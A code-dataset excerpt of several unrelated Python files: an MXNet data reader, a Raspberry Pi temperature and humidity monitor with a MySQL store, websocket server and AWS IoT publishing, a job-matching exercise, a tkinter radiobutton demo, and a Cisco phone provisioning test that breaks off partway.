cfg.batch_size,\n rand_crop = cfg.random_crop,\n # max_random_scale = cfg.max_random_scale,\n # min_random_scale = cfg.min_random_scale,\n # max_aspect_ratio = cfg.max_random_aspect_ratio,\n # random_h = cfg.max_random_h,\n # random_s = cfg.max_random_s,\n # random_l = cfg.max_random_l,\n # max_rotate_angle = cfg.max_random_rotate_angle,\n # max_shear_ratio = cfg.max_random_shear_ratio,\n rand_mirror = cfg.random_mirror,\n preprocess_threads = cfg.data_nthreads,\n shuffle = False,\n num_parts = nworker,\n part_index = rank,\n prefetch_buffer = 10)\n if cfg.data_valid is None:\n return (train, None)\n valid = mx.io.ImageRecordIter(\n path_imgrec = cfg.data_valid,\n label_width = 1,\n # mean_r = cfg.rgb_mean[0],\n # mean_g = cfg.rgb_mean[1],\n # mean_b = cfg.rgb_mean[2],\n scale=1.0 / 255,\n data_name = 'data',\n label_name = 'softmax_label',\n batch_size = cfg.batch_size,\n data_shape = cfg.image_shape,\n preprocess_threads = cfg.data_nthreads,\n rand_crop = False,\n rand_mirror = False,\n num_parts = nworker,\n part_index = rank,\n prefetch_buffer = 10)\n return (train, valid)\n\ndef get_rec_iter_test(batch_size=1):\n test = mx.io.ImageRecordIter(\n path_imgrec=cfg.data_test,\n label_width=1,\n # mean_r=cfg.rgb_mean[0],\n # mean_g=cfg.rgb_mean[1],\n # mean_b=cfg.rgb_mean[2],\n scale=1.0/255,\n data_name='data',\n # label_name='softmax_label',\n batch_size=batch_size,\n data_shape=cfg.image_shape,\n preprocess_threads=cfg.data_nthreads,\n rand_crop=False,\n rand_mirror=False)\n return test\n","sub_path":"mxm/release/googlenet/frame/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"485964844","text":"\"\"\"\nInterfacing DHT22 with Rpi3\n\n@author Vipraja Patil\n\n@description\nCreated .ui files using QT GUI. 
Using these .ui files craeted a Python application for retrieving temperature and humidity values from DHT22 sensor which is interfaced with Rpi3 and all these values are stored in a database. This Rpi also acts as a webserver and keeps on listening for requests from the client. According to the requests appropriate data is retrieved from the database and is sent to the client. \n\n@references:\nhttps://stackoverflow.com/questions/11812000/login-dialog-pyqt\nhttps://ralsina.me/posts/BB974.html\nhttps://gist.github.com/pklaus/3e16982d952969eb8a9a#file-embedding_in_qt5-py-L14\nhttps://www.youtube.com/watch?v=7SrD4l2o-uk\nhttps://circuitdigest.com/microcontroller-projects/publish-sensor-data-to-amazon-aws-raspberry-pi-iot\n\"\"\"\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.uic import loadUi\nimport Adafruit_DHT as sensor\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom datetime import datetime, time \nimport MySQLdb\nimport tornado.httpserver\nimport tornado.websocket\nimport tornado.ioloop\nimport tornado.web\nimport socket\nimport threading\nfrom threading import Lock\nimport time\nimport asyncio\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient\n\nlock = Lock()\nclient_data = \"\"\nconnection_flag = 0\nmqtt_client = AWSIoTMQTTClient(\"Rpi\")\naws_count = 0\nhumidity = 0\nhum_avg = 0\ntemp = 0\ntemp_avg = 0\ntemp_f = 0\ntemp_f_high = 0\ntemp_f_low = 0\ntemp_avg_f = 0\n\ntemp_list = []\nhum_list = []\n#Connect to the database\ndb = MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"root\", db=\"project2db\")\n# Create a Cursor object to execute queries.\ncur = db.cursor()\n# Clear database whenever we run the application\ncur.execute(\"DELETE IGNORE FROM temperatureDB\")\ndb.commit()\ncur.execute(\"DELETE IGNORE FROM humidityDB\")\ndb.commit()\n# Create tables in the 
database\ncur.execute(\"\"\"CREATE TABLE IF NOT EXISTS humidityDB (\n count int NOT NULL AUTO_INCREMENT,\n humidity varchar(255),\n timestamp varchar(255),\n highest varchar(255),\n lowest varchar(255),\n last varchar(255),\n average varchar(255),\n PRIMARY KEY (count)\n );\"\"\")\ndb.commit();\n\ncur.execute(\"\"\"CREATE TABLE IF NOT EXISTS temperatureDB (\n count int NOT NULL AUTO_INCREMENT,\n temperature varchar(255),\n timestamp varchar(255),\n highest varchar(255),\n lowest varchar(255),\n last varchar(255),\n average varchar(255),\n PRIMARY KEY (count)\n );\"\"\")\ndb.commit()\n\n'''\nServer sends requested data to the client according to the requests by extracting appropriate data from the mysql database.\n'''\nclass WSHandler(tornado.websocket.WebSocketHandler):\n def open(self):\n print('new connection')\n \n def on_message(self, message):\n global connection_flag\n print(\"connection flag handler {}\".format(connection_flag))\n print('message received: {}'.format(message))\n lock.acquire()\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM temperatureDB ORDER BY count DESC LIMIT 1\")\n for row in cursor.fetchall():\n print(connection_flag)\n if connection_flag == 1:\n self.write_message(\"Sensor not connected;Sensor not connected\")\n else:\n if message == \"TlastC\":\n self.write_message(\"{};{}\".format(row[5],row[2]))\n elif message == \"TlastF\":\n client_data = float(row[5])\n client_data = client_data * 1.8\n client_data = client_data + 32\n self.write_message(\"{};{}\".format(client_data, row[2]))\n elif message == \"TavgC\":\n self.write_message(\"{};{}\".format(row[6],row[2]))\n elif message == \"TavgF\":\n client_data = row[6]\n client_data = client_data * 1.8\n client_data = client_data + 32\n self.write_message(\"{};{}\".format(client_data,row[2]))\n elif message == \"ThighC\":\n self.write_message(\"{}:{}\".format(row[3],row[2]))\n elif message == \"ThighF\":\n client_data = row[3]\n client_data = client_data * 1.8\n client_data = 
client_data + 32\n self.write_message(\"{};{}\".format(client_data,row[2]))\n elif message == \"TlowC\":\n self.write_message(\"{};{}\".format(row[4],row[2]))\n elif message == \"TlowF\":\n client_data = row[4]\n client_data = client_data * 1.8\n client_data = client_data + 32\n self.write_message(\"{};{}\".format(client_data,row[2]))\n\n cursor.execute(\"SELECT * FROM humidityDB ORDER BY count DESC LIMIT 1\")\n for row in cursor.fetchall():\n if message == \"Hlast\":\n self.write_message(\"{};{}\".format(row[5],row[2]))\n elif message == \"Havg\":\n self.write_message(\"{};{}\".format(row[6],row[2]))\n elif message == \"Hlow\":\n self.write_message(\"{};{}\".format(row[4],row[2]))\n elif message == \"Hhigh\":\n self.write_message(\"{};{}\".format(row[3],row[2]))\n lock.release()\n\n def on_close(self):\n print('connection closed')\n \n def check_origin(self, origin):\n return True\n \napplication = tornado.web.Application([\n (r'/ws', WSHandler),\n])\n\n# Class defining Login dialog\nclass Login(QDialog):\n def __init__(self, parent=None):\n super(Login, self).__init__(parent)\n loadUi('login.ui',self)\n self.setWindowTitle('Login')\n self.user.text()\n self.password.text()\n self.login_button.clicked.connect(self.login_func)\n\n def login_func(self):\n if (self.user.text() == \"vipraja\" and self.password.text() == \"vipraja\"):\n self.accept()\n else:\n self.login_result.setText('Login unsucessful')\n \n\n# Main class which initializes all the functions required for displaying sensor values\nclass project1(QDialog):\n def __init__(self, parent=None):\n super(project1,self).__init__()\n loadUi('project3.ui',self)\n self.setWindowTitle('EID project 1')\n self.temp_button = 0\n self.hum_button = 0\n self.conversion_flag = 0 # 0- Celsius, 1- Fahrenheit\n self.temp_count = 0\n self.hum_count = 0\n \n global mqtt_client\n mqtt_client.configureEndpoint(\"a2jpudmlrkrlqa-ats.iot.us-east-2.amazonaws.com\", 8883)\n mqtt_client.configureCredentials(\"AmazonRootCA1.pem\", 
\"079f36358a-private.pem.key\",\"079f36358a-certificate.pem.crt\")\n mqtt_client.configureAutoReconnectBackoffTime(1, 32, 20)\n mqtt_client.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing\n mqtt_client.configureDrainingFrequency(2) # Draining: 2 Hz\n mqtt_client.configureConnectDisconnectTimeout(10) # 10 sec\n mqtt_client.configureMQTTOperationTimeout(5) \n\n mqtt_client.connect()\n self.today = datetime.now().strftime(\"%H:%M:%S %Y-%m-%d\")\n time = QTime.currentTime()\n self.temp_threshold.text()\n self.hum_threshold.text()\n self.refresh_temp.clicked.connect(self.temp_refresh_clicked)\n self.refresh_hum.clicked.connect(self.humidity_refresh_clicked)\n self.conversion_button.clicked.connect(self.conversion_clicked)\n self.get_temp()\n self.get_hum()\n self.aws_data()\n \n\n @pyqtSlot()\n # Celcius to Fahreinheit\n def conversion(self, temp):\n temp = temp * 1.8\n temp = temp + 32\n return temp\n\n # Displays temperature values, allows user to enter threshold value and gives an alert accordingly\n # Store temperature values in the database\n def get_temp(self):\n global connection_flag\n global mqtt_client\n global aws_count, temp, temp_avg, temp_f, temp_avg_f, temp_f_high, temp_f_low \n try:\n time = QTime.currentTime()\n humidity,temp = sensor.read(sensor.DHT22, 4)\n if temp is None or humidity is None:\n self.temp_value.setText('ERROR')\n print(\"*************Connection removed*************\")\n connection_flag = 1\n else:\n connection_flag = 0\n self.temp_count = self.temp_count + 1\n self.today = datetime.now().strftime(\"%H:%M:%S %Y-%m-%d\")\n temp_list.append(round(temp,4))\n print('{} count:{}'.format(temp,self.temp_count))\n tstr = self.temp_threshold.text()\n if not tstr:\n t = 26\n else:\n t = int(tstr)\n if self.temp_button == 1:\n if self.conversion_flag == 1:\n temp = temp * 1.8\n temp = temp + 32\n tstr = self.temp_threshold.text()\n if temp > (t*1.8)+32:\n self.alarm_temp.setText('ALERT HIGH TEMP')\n else:\n 
self.alarm_temp.setText('')\n self.temp_value.setText('{} F'.format(round(temp,4)))\n else:\n if temp > t:\n self.alarm_temp.setText('ALERT HIGH TEMP')\n else:\n self.alarm_temp.setText('')\n\n self.temp_value.setText('{} C'.format(round(temp,4)))\n self.temp_time.setText(self.today)\n self.temp_button = 0\n\n temp_avg = 0\n temp_list_count = 0;\n for i in temp_list:\n temp_avg = i + temp_avg\n temp_list_count = temp_list_count + 1\n temp_avg = temp_avg/temp_list_count\n if self.conversion_flag == 1:\n temp_avg_f = temp_avg\n temp_avg_f = temp_avg_f * 1.8\n temp_avg_f = temp_avg_f + 32\n\n temp_f = self.conversion(round(temp, 2))\n temp_f_high = self.conversion(max(temp_list))\n temp_f_low = self.conversion(min(temp_list))\n temp_avg_f = self.conversion(temp_avg)\n aws_count = aws_count + 1\n\n if (self.temp_count%8) == 0:\n if self.conversion_flag == 1:\n self.last_temp_label.setText('Last value: {} F'.format(round(temp,2))) \n self.avg_temp_label.setText('Average: {} F'.format(round(temp_avg_f,2))) \n self.high_temp_label.setText('Highest: {} F'.format(round(temp_f_high,2))) \n self.low_temp_label.setText('Lowest: {} F'.format(round(temp_f_low,2))) \n else:\n self.last_temp_label.setText('Last value: {} C'.format(round(temp,2)))\n self.avg_temp_label.setText('Average: {} C'.format(round(temp_avg,2)))\n self.high_temp_label.setText('Highest: {} C'.format(round(max(temp_list),2)))\n self.low_temp_label.setText('Lowest: {} C'.format(round(min(temp_list),2)))\n \n # print timestamp\n self.last_temp_time.setText('Time: {}'.format(self.today))\n self.avg_temp_time.setText('Time: {}'.format(self.today))\n self.high_temp_time.setText('Time: {}'.format(self.today))\n self.low_temp_time.setText('Time: {}'.format(self.today))\n \n #send data to aws cloud\n '''\n temp_message = \"TempC;\"+str(round(temp,2))+\";\"+str(round(max(temp_list),2))+\";\"+str(round(min(temp_list),2))+\";\"+str(round(temp_avg,2))+\";\"+self.today+\";\"\n print(\"{}\".format(temp_message))\n 
mqtt_client.publish(\"RpiPolicy\", temp_message, 0)\n temp_message = \"TempF;\"+str(round(temp_f,2))+\";\"+str(round(temp_f_high,2))+\";\"+str(round(temp_f_low,2))+\";\"+str(round(temp_avg_f,2))+\";\"+self.today+\";\"\n print(\"{}\".format(temp_message))\n mqtt_client.publish(\"RpiPolicy\", temp_message, 0)'''\n \n global cur\n lock.acquire()\n cur = db.cursor()\n #insert values in data base\n insert_statement = \"INSERT INTO temperatureDB (temperature, highest, lowest, average, last, timestamp) VALUES (%s, %s, %s, %s, %s, %s)\"\n val = (temp, max(temp_list), min(temp_list), temp_avg, temp, self.today)\n cur.execute(insert_statement, val)\n db.commit()\n cur.execute(\"SELECT * FROM temperatureDB\")\n db.commit()\n print(cur.rowcount, \"record inserted.\")\n lock.release()\n \n finally:\n self.temp_button = 0\n QTimer.singleShot(5000, self.get_temp)\n\n\n # Displays humidity values, allows user to enter threshold value and gives an alert accordingly\n # Store humidity values in the databse\n def get_hum(self):\n global mqtt_client\n global aws_count, humidity, hum_avg\n try:\n time = QTime.currentTime()\n self.today = datetime.now().strftime(\"%H:%M:%S %Y-%m-%d\")\n humidity,temp = sensor.read(sensor.DHT22, 4)\n if temp is None or humidity is None:\n self.hum_value.setText('ERROR')\n connection_flag = 1\n print(\"***********Connection removed**************\")\n else:\n connection_flag = 0\n self.hum_count = self.hum_count + 1\n if self.hum_button == 1:\n self.hum_value.setText('{} %'.format(round(humidity,4)))\n self.hum_time.setText(time.toString(Qt.DefaultLocaleLongDate))\n self.hum_button = 0\n hstr = self.hum_threshold.text()\n if not hstr:\n h = 50\n else:\n h = int(hstr) \n if humidity > h:\n self.alarm_hum.setText('ALERT HIGH HUM')\n else:\n self.alarm_hum.setText('')\n hum_avg = 0\n hum_list_count = 0\n hum_list.append(round(humidity,4))\n ws_count = aws_count + 1\n for i in hum_list:\n hum_avg = i + hum_avg\n hum_list_count = hum_list_count + 1\n hum_avg = 
hum_avg/hum_list_count\n\n #send data to aws cloud\n #hum_message = \"Hum;\"+str(round(humidity,2))+\";\"+str(round(max(hum_list),2))+\";\"+str(round(min(hum_list),2))+\";\"+str(round(hum_avg,2))+\";\"+self.today+\";\"\n #print(\"{}\".format(hum_message))\n #mqtt_client.publish(\"RpiPolicy\", hum_message, 0)\n\n if (self.hum_count%8 == 0):\n self.last_hum_label.setText('Last value: {} %'.format(round(humidity,2)))\n self.avg_hum_label.setText('Average: {} %'.format(round(hum_avg,2)))\n self.high_hum_label.setText('Highest: {} %'.format(round(max(hum_list),2)))\n self.low_hum_label.setText('Lowest: {} %'.format(round(min(hum_list),2)))\n self.last_hum_time.setText('Time: {}'.format(self.today))\n self.avg_hum_time.setText('Time: {}'.format(self.today))\n self.high_hum_time.setText('Time: {}'.format(self.today))\n self.low_hum_time.setText('Time: {}'.format(self.today))\n \n\n global cur\n lock.acquire()\n #insert values in data base\n insert_statement = \"INSERT INTO humidityDB (humidity, highest, lowest, average, last, timestamp) VALUES (%s, %s, %s, %s, %s, %s)\"\n val = (humidity, max(hum_list), min(hum_list), hum_avg, humidity, self.today)\n cur.execute(insert_statement, val)\n db.commit()\n lock.release()\n # cur.execute(\"SELECT * FROM humdidityDB\")\n\n finally:\n self.hum_button = 0\n QTimer.singleShot(5000, self.get_hum)\n\n # Whenever temeprature refresh button is pressed this function is called. This function then calls get_temp()\n # for displaying the temperature value\n def temp_refresh_clicked(self):\n self.temp_button = 1\n time = QTime.currentTime()\n self.get_temp()\n\n # Whenever humidity refresh button is pressed this function is called. 
This function then calls get_hum()\n # for displaying the humidity value\n def humidity_refresh_clicked(self):\n self.hum_button = 1\n time = QTime.currentTime()\n self.get_hum()\n\n # This function is called whenever the user needs to switch between units Celsius and Fahreinheit\n def conversion_clicked(self):\n self.conversion_flag = 1 - self.conversion_flag\n \n def aws_data(self):\n global temp, temp_avg, temp_f, temp_avg_f, temp_f_high, temp_f_low, humidity, hum_avg\n\t\t\t\n try:\n if (aws_count > 2 and temp is not None and humidity is not None):\n message = \"{\\\"time\\\": \\\"\"+self.today+\"\\\",\\\"TClast\\\":\\\"\"+str(round(temp,2))+\"\\\",\\\"TCavg\\\":\\\"\"+str(round(temp_avg,2))+\"\\\",\\\"TChigh\\\":\\\"\"+str(round(max(temp_list),2))+\"\\\",\\\"TClow\\\":\\\"\"+str(round(min(temp_list),2))+\"\\\",\\\"TFlast\\\":\\\"\"+str(round(temp_f))+\"\\\",\\\"TFavg\\\":\\\"\"+str(round(temp_avg_f))+\"\\\",\\\"TFhigh\\\":\\\"\"+str(round(temp_f_high))+\"\\\",\\\"TFlow\\\":\\\"\"+str(round(temp_f_low))+\"\\\",\\\"Hlast\\\":\\\"\"+str(round(humidity,2))+\"\\\",\\\"Havg\\\":\\\"\"+str(round(hum_avg,2))+\"\\\",\\\"Hhigh\\\":\\\"\"+str(round(max(hum_list),2))+\"\\\",\\\"Hlow\\\":\\\"\"+str(round(min(hum_list),2))+\"\\\"}\"\n print(\"{}\".format(message))\n mqtt_client.publish(\"RpiPolicy\", message, 0)\n finally:\n QTimer.singleShot(5000, self.aws_data)\n\n'''\nThis thread is created for running the server side by side with the QT application. This is called after successful \nlogin. 
Server keeps on listening for requests continuously.\n'''\ndef thread1():\n asyncio.set_event_loop(asyncio.new_event_loop())\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(8888)\n myIP = socket.gethostbyname(socket.gethostname())\n print ('*** Websocket Server Started at %s***' % myIP)\n while True:\n tornado.ioloop.IOLoop.instance().start()\n\nt = threading.Thread(name=\"thread1\", target=thread1)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n login = Login()\n\n if login.exec_() == QtWidgets.QDialog.Accepted:\n widget = project1()\n widget.show()\n t.daemon = True\n t.start()\n sys.exit(app.exec_())\n \n\n","sub_path":"3_project/server/project3.py","file_name":"project3.py","file_ext":"py","file_size_in_byte":19449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227769847","text":"#no\nimport bisect\nimport sys\nlines = sys.stdin.readlines()\nN, M = list(map(int, lines[0].strip().split()))\nD_P = {}\nfor line in lines[1:-1]:\n if not line.strip().split():\n continue\n a,b=map(int,line.strip().split())\n D_P.update({a:b})\narr = sorted(D_P.keys())\nfor j in range(1,len(arr)):\n if D_P[arr[j]] < D_P[arr[j-1]]:\n D_P[arr[j]] = D_P[arr[j-1]]\nAi = map(int,lines[-1].strip().split())\nfor a in Ai:\n inds = bisect.bisect(arr, a)\n if inds == 0:\n print(0)\n else:\n 
print(D_P[arr[inds-1]])\n'''了找到自己满意的工作,牛牛收集了每种工作的难度和报酬。牛牛选工作的标准是在难度不超过自身能力值的情况下,牛牛选择报酬最高的工作。在牛牛选定了自己的工作后,牛牛的小伙伴们来找牛牛帮忙选工作,牛牛依然使用自己的标准来帮助小伙伴们。牛牛的小伙伴太多了,于是他只好把这个任务交给了你。\n输入描述:\n每个输入包含一个测试用例。\n每个测试用例的第一行包含两个正整数,分别表示工作的数量N(N<=100000)和小伙伴的数量M(M<=100000)。\n接下来的N行每行包含两个正整数,分别表示该项工作的难度Di(Di<=1000000000)和报酬Pi(Pi<=1000000000)。\n接下来的一行包含M个正整数,分别表示M个小伙伴的能力值Ai(Ai<=1000000000)。\n保证不存在两项工作的报酬相同。\n输出描述:\n对于每个小伙伴,在单独的一行输出一个正整数表示他能得到的最高报酬。一个工作可以被多个人选择。'''","sub_path":"笔试面试题/公司牛客刷题/最大最小等/牛牛找工作.py","file_name":"牛牛找工作.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"76483347","text":"from tkinter import *\n\ndef show_options():\n options.set(\"{} aged {}.\".format(gender.get(), agerange.get()))\n\nwindow = Tk()\nwindow.title(\"Providing options with radiobuttons\")\nwindow.geometry(\"700x140\")\n\nframe_gender = Frame(window, bg=\"lightgray\")\nframe_gender.place(x=10, y=10)\nframe_agerange = Frame(window, bg=\"lightgray\")\nframe_agerange.place(x=120, y=10)\n\nbtn_select = Button(window, text=\"Select\", command=show_options)\nbtn_select.place(x=10, y=80)\ngender = StringVar()\n\nrad_female = Radiobutton(frame_gender, text=\"Female\", value=\"Female\", variable=gender, bg=\"lightgray\")\nrad_female.pack(side=TOP, anchor=W)\nrad_male = Radiobutton(frame_gender, text=\"Male\", value=\"Male\", variable=gender, bg=\"lightgray\")\nrad_male.pack(side=TOP, anchor=W)\nrad_female.select()\nagerange = StringVar()\n\nrad_under18 = Radiobutton(frame_agerange, text=\"Under 18\", value=\"under 18\", variable=agerange, bg=\"lightgray\")\nrad_under18.pack(side=TOP, anchor=W)\nrad_18to30 = Radiobutton(frame_agerange, text=\"18 to 30\", value=\"18 to 30\", variable=agerange, bg=\"lightgray\")\nrad_18to30.pack(side=TOP, anchor=W)\nrad_over30 = Radiobutton(frame_agerange, text=\"Over 30\", value=\"over 30\", variable=agerange, bg=\"lightgray\")\nrad_over30.pack(side=TOP, 
anchor=W)\nrad_18to30.select()\n\noptions = StringVar()\nshow_options()\n\nlbl_options = Label(window, textvariable=options)\nlbl_options.place(x=10, y=110)\nwindow.mainloop()","sub_path":"radiobuttonsscript.py","file_name":"radiobuttonsscript.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"380225889","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id: cmPROV_3pcc_provisioning_rule.py\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nReferences:\n Tph10084990c\n Tph10084992c\n Tph10084993c\n\nTest Cases:\n test01_GPP_A\n test02_GPPa_UserPwd_GPPsd\n test03_GPPa_UserPwd_GPPsa\n\nTopology:\n 1. 1 3pcc phone\n 2. 1 http server\n 3. 1 tftp server\n 4. 1 https server\n\nNotes:\n\nKonow bugs:\n\n\"\"\"\n\nimport tng\nimport re\nimport logging\nimport urllib\nfrom tng.frontend.timing import wait, until, retry\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.phone_config_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\n\nlog = logging.getLogger('ProvisionWithHttpTftp')\n\n\nclass ProvisionWithHttpTftp(SetupHelpersTestCase, tng.api.TestCase):\n\n helpers = (PhoneConfigHelper, PhoneLineRegHelper)\n helper_num_devices = 1\n\n serverIP = '1.1.1.1'\n GPP_A_value = 'aaaa'\n User_Password = '1234'\n GPP_SD_value = 'abcd'\n GPP_SA_value = 'abcd'\n macrostr = '/$A.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD'\n port = {'http': '80', 'tftp': '69', 'https': '443'}\n\n @classmethod\n def setUpClass(cls):\n log.info(\"Start of setUpClass\")\n\n # clean user password\n def clean_UserPassword():\n cls.oPhone1.ui.set_param_value({'User Password': ''})\n\n cls.addCleanupClass(clean_UserPassword)\n\n log.info(\"End of setUpClass\")\n\n def get_resync_index_from_status(self):\n resync_status = self.oPhone1.ui.get_param_value(\n 'Provisioning Status 1')\n resync_id = int(re.findall(r'\\d+', 
resync_status)[0])\n return resync_id\n\n def check_macro_is_configure(self, protype, port, resync_index):\n log.info(\"Start of check_macro_is_configure\")\n\n status_str = self.oPhone1.ui.get_param_value('Provisioning Status 1')\n log.info(\"Provisioning Status 1: %s\", status_str)\n\n final_str = (\n '{}{}:{}/{}.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD]Resync Failed'.format(\n protype, self.serverIP, self.port[port], self.GPP_A_value))\n checks = [\"[{}]\".format(resync_index), final_str]\n\n return all([chk in status_str for chk in checks])\n\n def check_macro_is_condition(self, prefix_str, protype, resync_index):\n log.info(\"Start of check_macro_is_condition\")\n\n self.oPhone1.ui.set_param_value({\n 'Profile Rule': prefix_str + protype + self.serverIP + '/$A.xml'\n })\n status_str = self.oPhone1.ui.get_param_value('Provisioning Status 1')\n log.info(\"Provisioning Status 1: %s\", status_str)\n\n final_str = ('Resync Failed. Reason: Error - Parse error in rule')\n checks = [\"[{}]\".format(resync_index), final_str]\n\n return all([chk in status_str for chk in checks])\n\n def check_macro_next_index(self, *args):\n resync_index = (self.get_resync_index_from_status() + 1) % 65536\n myargs = list(args) + [resync_index]\n until(\n self.check_macro_is_condition, args=tuple(myargs), timeout=10,\n raise_msg=\"Expanded ERROR: {!r}\".format(myargs)\n )\n\n # ==================Group Provision With Http & Tftp==========\n # TIMS ID: Tph10084990c\n # Author: Chen Yu (chenyu2@cisco.com)\n # Description and Test Steps:\n # SetUp\n # 1. Setup a http and tftp server(eg.test.com)\n # 2. create configuration file as a.xml\n # aaaa\n # 3.Go to web->admin/advanved->Profile Rule=\n # http://provisioning_server/a.xml\n # 4. Go to WEB GUI admin/advanved->System-> Debug Level = DEBUG\n #\n # Procedure\n # 1.Open WEB GUI\n # 2.Go to admin/advanved page Provisioning tab\n # 3. Go to profile rule\n # 4. Edit the profile ad below\n # http://test.com/$A.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD\n # 5. 
Edit the profile as below\n # tftp://test.com/$A.xml?&mpwd=$MPWD&key=$SA\n # 6. Go to WEB gui:\n # http://phoneIP/admin/resync?\\\n # http://test.com/$A.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD\n #\n # Expected Result:\n # After step 4 check: $MPWD,$PWD,$SA is not expanded\n # 1. Check the http server log, the request rul is :\n # /aaaa.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD\n # After step 5 check: $MPWD,$PWD,$SA is not expanded\n # 1. Check the tftp server log, the request rul is :\n # /aaaa.xml?&mpwd=$MPWD&key=$SA\n # After step 6 check: $MPWD,$PWD,$SA is not expanded\n # 1. Check the http server log, the request rul is :\n # /aaaa.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD\n\n def test01_GPP_A(self):\n log.info(\"Start of test01_GPP_A\")\n\n self.oPhone1.ui.set_param_value({'GPP A': self.GPP_A_value})\n # step 4\n self.oPhone1.ui.set_param_value({\n 'Profile Rule': 'http://' + self.serverIP + self.macrostr\n })\n\n resync_index = (self.get_resync_index_from_status() + 1) % 65536\n until(\n self.check_macro_is_configure,\n args=('http://', 'http', resync_index),\n timeout=20,\n raise_msg=\"Expanded ERROR\")\n # step 5\n self.oPhone1.ui.set_param_value({\n 'Profile Rule': 'tftp://' + self.serverIP + self.macrostr\n })\n resync_index = (self.get_resync_index_from_status() + 1) % 65536\n until(\n self.check_macro_is_configure,\n args=('tftp://', 'tftp', resync_index),\n timeout=35,\n raise_msg=\"Expanded ERROR\")\n # step 6\n final_rule = 'http://' + self.serverIP + self.macrostr\n urllib.urlopen('http://{}/admin/resync?{}'.format(\n self.oPhone1.ip, final_rule))\n\n resync_index = (self.get_resync_index_from_status() + 1) % 65536\n until(\n self.check_macro_is_configure,\n args=('http://', 'http', resync_index),\n timeout=40,\n raise_msg=\"Expanded ERROR\")\n\n log.info(\"End of test01_GPP_A\")\n\n # TIMS ID: Tph10084992c\n # Author: Chen Yu (chenyu2@cisco.com)\n # Description and Test Steps:\n # SetUp\n # 1. Setup a http and tftp server(eg.test.com)\n # 2. 
create configuration file as a.xml\n # aaaa\n # 1234\n # abcd\n # 3.Go to web->admin/advanved->Profile Rule=\n # http://provisioning_server/a.xml\n # 4. Go to WEB GUI admin/advanved->System-> Debug Level = DEBUG\n #\n # Procedure\n # 1.Open WEB GUI\n # 2.Go to admin/advanved page Provisioning tab\n # 3. Go to profile rule\n # 4. Edit the profile ad below\n # (\"$MPWD\"==\"\")?http://test.com/$A.xml\n # 5. Edit the profile as below\n # (\"$MPWD\"==\"\")?https://test.com/$A.xml\n # 6. Edit the profile as below\n # (\"$MPWD\"==\"\")?tftp://test.com/$A.xml\n #\n # Expected Result:\n # After step 4,5,6check:\n # 1. Go to the web->Debug Info,check the phone's message:\n # Condition not met.$MPWD not expanded,$A is expanded\n\n def test02_GPPa_UserPwd_GPPsd(self):\n log.info(\"Start of test02_GPPa_UserPwd_GPPsd\")\n\n self.oPhone1.ui.set_param_value({\n 'GPP A': self.GPP_A_value,\n 'User Password': self.User_Password,\n 'GPP SD': self.GPP_SD_value\n })\n prefix_str = '(\"$MPWD\"==\"\")?'\n # step 4\n self.check_macro_next_index(prefix_str, 'http://')\n\n # step 5\n self.check_macro_next_index(prefix_str, 'https://')\n\n # step 6\n self.check_macro_next_index(prefix_str, 'tftp://')\n\n log.info(\"End of test02_GPPa_UserPwd_GPPsd\")\n\n # TIMS ID: Tph10084993c\n # Author: Chen Yu (chenyu2@cisco.com)\n # Description and Test Steps:\n # SetUp\n # 1. Setup a http and tftp server(eg.test.com)\n # 2. create configuration file as a.xml\n # aaaa\n # 1234\n # abcd\n # 3.Go to web->admin/advanved->Profile Rule=\n # http://provisioning_server/a.xml\n # 4. Go to WEB GUI admin/advanved->System-> Debug Level = DEBUG\n #\n # Procedure\n # 1.Open WEB GUI\n # 2.Go to admin/advanved page Provisioning tab\n # 3. Go to profile rule\n # 4. Edit the profile ad below\n # (\"$PWD\"==\"aaaa\")?http://test.com/$A.xml\n # 5. Edit the profile as below\n # (\"$SA\"==\"aaaa\")?http://test.com/$A.xml\n # 6. Edit the profile ad below\n # (\"$PWD\"==\"aaaa\")?https://test.com/$A.xml\n # 7. 
